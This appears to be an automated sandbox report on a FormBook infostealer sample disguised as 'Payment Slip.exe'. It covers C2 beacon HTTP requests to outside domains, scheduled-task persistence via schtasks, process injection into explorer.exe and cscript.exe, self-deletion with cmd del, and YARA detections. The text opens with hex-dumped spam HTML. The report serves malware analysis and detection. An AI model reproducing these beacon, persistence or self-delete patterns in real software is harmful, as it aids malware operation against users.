30 31 33 35 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 32 30 32 36 32 3b 26 23 32 30 32 36 32 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 32 30 32 36 32 3b 2c 26 23 32 30 30 30 34 3b 26 23 32 30 30 31 30 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 36 36 3b 26 23 36 38 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 34 39 3b 2c 26 23 33 36 32 32 39 3b 26 23 33 30 37 30 31 3b 26 23 33 35 30 33 33 3b 26 23 32 31 33 39 37 3b 26 23 32 35 31 35 32 3b 26 23 33 38 37 30 36 3b 26 23 33 33 30 38 30 3b 26 23 32 30 38 34 30 3b 26 23 32 36 32 32 33 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 30 34 3b 26 23 32 30 30 31 30 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 36 36 3b 26 23 36 38 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 34 39 3b 2c 26 23 33 36 32 32 39 3b 26 23 33 30 37 30 31 3b 26 23 33 35 30 33 33 3b 26 23 32 31 33 39 37 3b 26 23 32 35 31 35 32 3b 26 23 33 38 37 30 36 3b 26 23 33 33 30 38 30 3b 26 23 32 30 38 34 30 3b 26 23 32 36 32 32 33 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 31 33 32 30 3b 26 23
                                                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#22269;&#20135;&#21320;&#22812;&#20262;&#20262;&#21320;&#22812;&#20262;,&#20004;&#20010;&#20154;&#20813;&#36153;&#35270;&#39057;&#35266;&#30475;&#66;&#68;,&#26080;&#30721;&#20122;&#27954;&#32508;&#21512;&#20013;&#25991;&#23383;&#24149;&#50;&#48;&#49;,&#36229;&#30701;&#35033;&#21397;&#25152;&#38706;&#33080;&#20840;&#26223;&#20599;&#25293;</title><meta name="keywords" content="&#22269;&#20135;&#21320;&#22812;&#20262;&#20262;&#21320;&#22812;&#20262;,&#20004;&#20010;&#20154;&#20813;&#36153;&#35270;&#39057;&#35266;&#30475;&#66;&#68;,&#26080;&#30721;&#20122;&#27954;&#32508;&#21512;&#20013;&#25991;&#23383;&#24149;&#50;&#48;&#49;,&#36229;&#30701;&#35033;&#21397;&#25152;&#38706;&#33080;&#20840;&#26223;&#20599;&#25293;" /><meta name="description" content="&#20004;&#20010;&#20154;&#20813;&#36153;&#35270;&#39057;&#35266;&#30475;&#66;&#68;,&#26080;&#30721;&#20122;&#27954;&#32508;&#21512;&#20013;&#25991;&#23383;&#24149;&#50;&#48;&#49;,&#36229;&#30701;&#35033;&#21397;&#25152;&#38706;&#33080;&#20840;&#26223;&#20599;&#25293;,&#22269;&#20135;&#21320;&#


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.449842198.54.117.21180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 27, 2021 15:39:53.068717003 CEST6006OUTGET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=WUvvsVcot/hHbudm+hsx8n+3xo5kp+HgCKvLXtoOkn7qJe0B64lU7/LdjKxnrj37XfZ9 HTTP/1.1
                                                    Host: www.axswallet.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.44984334.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 27, 2021 15:39:58.303410053 CEST6007OUTGET /qfff/?h0Dpm=vpb6mGWiOxgVIXv3RY5+KwgpuQ4maEKqCh4MrndOejQXnr3fUcd6GXEqF18QrWYsNfL0&zVsX=A0Gd4dmxD4WpN HTTP/1.1
                                                    Host: www.interweavelife.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 27, 2021 15:39:58.482220888 CEST6007INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Mon, 27 Sep 2021 13:39:58 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "614a6c08-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:15:37:54
                                                    Start date:27/09/2021
                                                    Path:C:\Users\user\Desktop\Payment Slip.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\Payment Slip.exe'
                                                    Imagebase:0x190000
                                                    File size:850944 bytes
                                                    MD5 hash:3D0D9C87EA732CAF417AFA0B8AF62267
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.708947520.000000000268B000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:15:38:10
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\uVxomBuy' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F38.tmp'
                                                    Imagebase:0x13b0000
                                                    File size:185856 bytes
                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:15:38:10
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:15:38:10
                                                    Start date:27/09/2021
                                                    Path:C:\Users\user\Desktop\Payment Slip.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\Payment Slip.exe
                                                    Imagebase:0x350000
                                                    File size:850944 bytes
                                                    MD5 hash:3D0D9C87EA732CAF417AFA0B8AF62267
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low

                                                    General

                                                    Start time:15:38:13
                                                    Start date:27/09/2021
                                                    Path:C:\Users\user\Desktop\Payment Slip.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\Payment Slip.exe
                                                    Imagebase:0xd00000
                                                    File size:850944 bytes
                                                    MD5 hash:3D0D9C87EA732CAF417AFA0B8AF62267
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:15:38:14
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff6fee60000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    General

                                                    Start time:15:38:42
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\SysWOW64\cscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cscript.exe
                                                    Imagebase:0x11f0000
                                                    File size:143360 bytes
                                                    MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:15:38:50
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\Payment Slip.exe'
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:15:38:51
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >